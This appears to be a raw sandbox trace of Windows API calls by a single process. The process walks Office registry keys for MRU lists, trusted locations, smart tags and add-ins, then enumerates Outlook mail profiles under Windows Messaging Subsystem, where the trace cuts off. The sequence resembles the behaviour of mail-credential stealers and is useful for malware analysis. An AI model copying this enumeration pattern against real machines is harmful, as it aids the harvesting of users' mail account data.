[0135.249] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Graph_Core", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.250] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.250] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Misc_SpsOutlookAddin", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.250] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.250] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Mso_Core", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.250] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.250] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Mso_CoreReg", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.250] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.250] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Mso_Intl", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.251] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.251] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\OneNoteToIEAddin", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.251] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.251] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\OneNoteToPPTAddin", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.251] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.251] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\OneNoteToWordAddin", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.251] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.251] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\outexum", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.251] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.252] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Outlook_AutoDiscover", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.252] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.252] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Outlook_Core", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.252] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.252] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Outlook_Intl", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.252] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.252] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Outlook_SearshShellReg", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.252] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.253] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Outlook_SocialConnector", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.253] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.253] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Outlook_SocialProviderMOSS", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.253] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.253] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\PowerPoint_Core", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.253] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.253] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\PowerPoint_Intl", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.253] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.253] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Visio_DBSamples", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.254] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.254] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Visio_VisioExe", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.254] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.254] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Word_Core", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.254] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.254] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\Word_Intl", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.254] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.254] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\User Settings\\XDocs_XMLEditVerbHandler", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.255] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.255] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.255] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Visio", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.255] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Visio\\Application", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.255] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.255] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Visio\\Recent Templates", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.255] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.255] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Visio\\Security", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.256] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Visio\\Security\\Trusted Documents", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.256] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.256] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Visio\\Security\\Trusted Locations", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.256] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.256] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.256] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Visio\\Toolbars", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.256] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Visio\\Toolbars\\State", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.257] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.257] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.257] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.257] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.257] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Data", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.257] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.257] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\File MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.258] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.258] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Options", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.258] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.258] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Place MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.258] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.258] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Security", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.258] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Security\\FileBlock", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.258] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.258] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.259] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.259] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Security\\Trusted Locations", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.259] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Security\\Trusted Locations\\Location0", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0135.259] RegCloseKey (hKey=0x5bc) returned 0x0 [0135.259] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Security\\Trusted Locations\\Location1", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0135.259] RegCloseKey (hKey=0x5bc) returned 0x0 [0135.259] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Security\\Trusted Locations\\Location2", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0135.260] RegCloseKey (hKey=0x5bc) returned 0x0 [0135.260] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.260] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.260] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Wizards", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.260] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.260] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.260] RegCloseKey (hKey=0x5a8) returned 0x0 [0135.260] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\8.0", phkResult=0x36f44c | out: phkResult=0x36f44c*=0x5a8) returned 0x0 [0135.260] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\8.0\\Excel", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.261] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\8.0\\Excel\\File MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.261] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.261] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\8.0\\Excel\\Place MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.261] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.261] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.261] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\8.0\\Outlook", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.261] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.261] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\8.0\\PowerPoint", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.262] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\8.0\\PowerPoint\\File MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.262] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.262] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\8.0\\PowerPoint\\Place MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.262] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.262] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.262] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\8.0\\Word", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.262] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\8.0\\Word\\File MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.262] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.263] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\8.0\\Word\\Place MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.263] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.263] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.263] RegCloseKey (hKey=0x5a8) returned 0x0 [0135.263] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common", phkResult=0x36f44c | out: phkResult=0x36f44c*=0x5a8) returned 0x0 [0135.263] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Offline", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.263] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Offline\\Files", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.263] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.264] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Offline\\Options", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.264] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.264] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.264] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Security", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.264] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.264] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.264] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Actions", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.264] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Actions\\{06F9A697-9708-422D-A5AF-C559391A850A}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.265] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.265] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Actions\\{16A933D2-A296-49D5-96FC-C7C2DAEE88B4}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.265] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.265] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Actions\\{339361CD-6723-455D-A40B-C95F1F91FF8A}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.265] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.265] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Actions\\{3CC385AC-95CC-4A75-BF35-AB36AE645BCF}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.265] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.265] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Actions\\{49DF3409-46B3-4B0C-B7BF-FEC0F9401EDD}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.266] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.266] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Actions\\{579A3C71-2339-4dee-A735-24BF2D1C5814}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.266] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.266] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Actions\\{64AB6C69-B40E-40AF-9B7F-F5687B48E2B6}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.266] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.266] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Actions\\{99E0D1EC-0A0D-4E50-B8A1-82A8B6ECE5CB}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.266] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.266] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Actions\\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.266] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.266] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Actions\\{C3754D1A-04D3-4085-8CFB-97705B57A98F}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.267] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.267] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Actions\\{F114AE61-1331-4238-92C9-BBE330AF25FD}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.267] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.267] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.267] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Applications", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.267] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Applications\\OpusApp", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.267] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.267] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Applications\\XLMAIN", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.268] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.268] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.268] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Recognizers", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.268] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Recognizers\\{3133A7FE-BC5F-4D81-BF02-184ECC88D66E}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.268] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.268] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Recognizers\\{32D85DA2-070B-49A0-9261-E7854457A6D6}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.268] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.268] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Recognizers\\{579A3C71-2339-4dee-A735-24BF2D1C5814}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.269] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.269] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Recognizers\\{64AB6C69-B40E-40AF-9B7F-F5687B48E2B6}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.269] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Recognizers\\{64AB6C69-B40E-40AF-9B7F-F5687B48E2B6}\\urn:schemas-microsoft-com:office:smarttags#phone", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0135.269] RegCloseKey (hKey=0x5bc) returned 0x0 [0135.269] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Recognizers\\{64AB6C69-B40E-40AF-9B7F-F5687B48E2B6}\\urn:schemas-microsoft-com:office:smarttags#time", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0135.269] RegCloseKey (hKey=0x5bc) returned 0x0 [0135.269] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.269] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\Smart Tag\\Recognizers\\{87EF1CFE-51CA-4E6B-8C76-E576AA926888}", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0135.270] RegCloseKey (hKey=0x5b8) returned 0x0 [0135.270] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.270] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.270] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Common\\UserInfo", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.270] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.270] RegCloseKey (hKey=0x5a8) returned 0x0 [0135.270] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook", phkResult=0x36f44c | out: phkResult=0x36f44c*=0x5a8) returned 0x0 [0135.270] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\Addins", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.270] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\Addins\\AccessAddin.DC", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.271] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.271] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\Addins\\ColleagueImport.ColleagueImportAddin", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.271] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.271] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.271] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\SocialConnector", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.271] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.271] RegCloseKey (hKey=0x5a8) returned 0x0 [0135.271] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\PowerPoint", phkResult=0x36f44c | out: phkResult=0x36f44c*=0x5a8) returned 0x0 [0135.272] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\PowerPoint\\Addins", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.272] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\PowerPoint\\Addins\\OneNote.PowerPointAddinTakeNotesService", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.272] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.272] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.272] RegCloseKey (hKey=0x5a8) returned 0x0 [0135.272] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Word", phkResult=0x36f44c | out: phkResult=0x36f44c*=0x5a8) returned 0x0 [0135.272] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Word\\Addins", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.272] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Word\\Addins\\OneNote.WordAddinTakeNotesService", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0135.273] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.273] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.273] RegCloseKey (hKey=0x5a8) returned 0x0 [0135.380] RegCloseKey (hKey=0x5a4) returned 0x0 [0135.380] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles", phkResult=0x36f474 | out: phkResult=0x36f474*=0x0) returned 0x2 [0135.380] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0135.380] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd618 [0135.381] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles", phkResult=0x36f474 | out: phkResult=0x36f474*=0x5a4) returned 0x0 [0135.381] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9145620 [0135.381] RegEnumKeyA (in: hKey=0x5a4, dwIndex=0x0, lpName=0x9145620, cchName=0x400 | out: lpName="Outlook") returned 0x0 [0135.381] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd680 [0135.381] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", phkResult=0x36f44c | out: phkResult=0x36f44c*=0x5a8) returned 0x0 [0135.381] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0135.381] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd680 [0135.381] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91283f0 [0135.381] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x0, lpName=0x91283f0, cchName=0x400 | out: lpName="05cb6f136411cf4daf1f74e966b0a7dc") returned 0x0 [0135.381] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.381] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.381] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.381] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging 